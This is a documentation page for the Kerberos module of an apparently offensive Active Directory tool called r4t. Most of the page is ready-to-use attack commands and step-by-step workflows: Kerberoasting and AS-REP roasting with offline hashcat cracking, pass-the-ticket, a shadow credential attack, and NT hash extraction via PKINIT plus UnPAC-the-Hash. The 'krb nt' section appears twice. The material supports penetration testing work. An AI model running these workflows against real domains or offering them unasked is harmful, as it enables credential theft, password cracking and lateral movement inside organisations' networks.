Documentation Index
Fetch the complete documentation index at: https://wiki.krkn.tech/llms.txt
Use this file to discover all available pages before exploring further.
Kerberos
The krb command provides Kerberos ticket operations: obtaining TGTs and TGSs, and extracting NT hashes via PKINIT + UnPAC-the-Hash.
Usage
r4t krb <subcommand> [flags]
Persistent Flags
| Flag | Description |
|---|
--dcs | Load domain controllers from the database as targets |
Subcommands
krb nt
Extract the NT hash of an account using PKINIT + UnPAC-the-Hash.
When you have a valid certificate for an account (e.g., obtained via adcs req), you can authenticate via Kerberos PKINIT to get a TGT, then extract the NT hash from the PAC field. This allows lateral movement with Pass-the-Hash even when you only have a certificate.
# Using PFX certificate (loaded from stored credential or inline)
r4t krb nt --pfx /tmp/admin.pfx
# Override UPN (when the certificate UPN differs from the target)
r4t krb nt --pfx /tmp/admin.pfx --upn administrator@corp.example.com
Flags
| Flag | Description |
|---|
--upn | Override UPN for authentication |
Authentication flags (--pfx, --pfx-password, --cert, --key, --ccache) are inherited from the global flags or stored credential.
krb tgt
Obtain a Ticket Granting Ticket (TGT) for an account.
# Using stored credential (password or hash)
r4t krb tgt
# Specific target DC
r4t krb tgt dc01.corp.example.com
# With explicit credentials
r4t krb tgt -u jsmith -p 'P@ssword1' -d corp.example.com dc01.corp.example.com
# Using AES key
r4t krb tgt --aes <aes-key> -u jsmith -d corp.example.com
# Using PFX certificate (PKINIT)
r4t krb tgt --pfx /tmp/user.pfx dc01.corp.example.com
# Using shadow credential private key (no cert, key-only PKINIT)
r4t krb tgt --key /tmp/shadow.key -u jsmith -d corp.example.com
Flags
| Flag | Description |
|---|
--upn | User Principal Name (optional override) |
--key | Private key file for shadow credential / key-only PKINIT |
--pfx | PFX file for PKINIT authentication |
--pfx-password | PFX passphrase |
--aes | AES-128 or AES-256 key |
- Written to a ccache file (path printed to stdout)
- Stored in the
tgts table in SQLite
- Linked to the active credential record
krb tgs
Obtain a Ticket Granting Service ticket (TGS) for a specific SPN. Used for Kerberoasting.
# Get TGS for a specific SPN
r4t krb tgs --spn "HTTP/app.corp.example.com"
# With SID targeting
r4t krb tgs --spn "MSSQLSvc/sql.corp.example.com:1433" --sid S-1-5-21-...
Flags
| Flag | Description |
|---|
--spn | Target Service Principal Name (required) |
--sid | Target account SID |
- Written as a kirbi/ccache file
- Output in hashcat format for offline cracking (
$krb5tgs$23$...)
- Stored in the
tgss table and the hash in kerberoast_hashes
krb nt
Extract the NT hash of an account using PKINIT + UnPAC-the-Hash.
This requires a valid certificate for the target account. Authenticate via Kerberos PKINIT to receive a TGT, then extract the NT hash embedded in the PAC (Privilege Attribute Certificate).
# Using stored PFX credential
r4t krb nt
# With explicit PFX
r4t krb nt --pfx /tmp/admin.pfx
# Override UPN
r4t krb nt --upn administrator@corp.example.com
Flags
| Flag | Description |
|---|
--upn | Override the UPN used for PKINIT |
credentials table.
This is the same operation as adcs nt — both subcommands perform PKINIT + UnPAC-the-Hash. krb nt is the Kerberos-centric entry point, adcs nt is the ADCS-centric one.
Kerberos Authentication Methods
R4t supports all standard Kerberos authentication pre-authentication methods:
| Method | Description |
|---|
| Password | Standard PA-ENC-TIMESTAMP |
| NT Hash | RC4-HMAC pre-auth |
| AES Key | AES-128 or AES-256 pre-auth |
| PKINIT (PFX) | Public key pre-authentication with PFX certificate |
| PKINIT (PEM) | Public key pre-authentication with PEM cert + key |
| PKINIT (Key-only) | Shadow credential attack — key without a certificate |
Ticket Storage
| Table | Contents |
|---|
tgts | Kerberos TGTs (base64-encoded ticket, expiry, target DC) |
tgss | Kerberos TGSs (ticket, SPN, encryption type) |
kerberoast_hashes | Kerberoastable TGS hashes in hashcat format |
asrep_hashes | AS-REP roastable hashes |
Common Kerberos Workflows
Kerberoasting
# 1. Find Kerberoastable accounts
r4t ldap get spn
# 2. Get TGS for each SPN
r4t krb tgs --spn "MSSQLSvc/sql.corp.example.com:1433"
# 3. Crack offline
hashcat -m 13100 kerberoast.hash wordlist.txt
AS-REP Roasting
# Find AS-REP roastable accounts (no pre-auth required)
r4t ldap scan
# View AS-REP hashes
r4t dbquery "SELECT * FROM asrep_hashes"
# Crack offline
hashcat -m 18200 asrep.hash wordlist.txt
Pass-the-Ticket
# Get a TGT and save to ccache
r4t krb tgt -u jsmith --hash <hash> -d corp.example.com
# Use the ccache in subsequent commands
export KRB5CCNAME=/tmp/jsmith.ccache
r4t ldap get users --ccache /tmp/jsmith.ccache
Shadow Credential Attack
# 1. Inject a key credential (via ldap dacl + modify or dedicated tool)
# 2. Get TGT using the private key
r4t krb tgt --key /tmp/injected.key -u targetuser -d corp.example.com
# 3. Extract NT hash
r4t krb nt --key /tmp/injected.key -u targetuser -d corp.example.com
PKINIT from ADCS Certificate
# After obtaining a certificate via adcs req
r4t krb tgt --pfx /tmp/admin.pfx
# Or extract the NT hash directly
r4t krb nt --pfx /tmp/admin.pfx
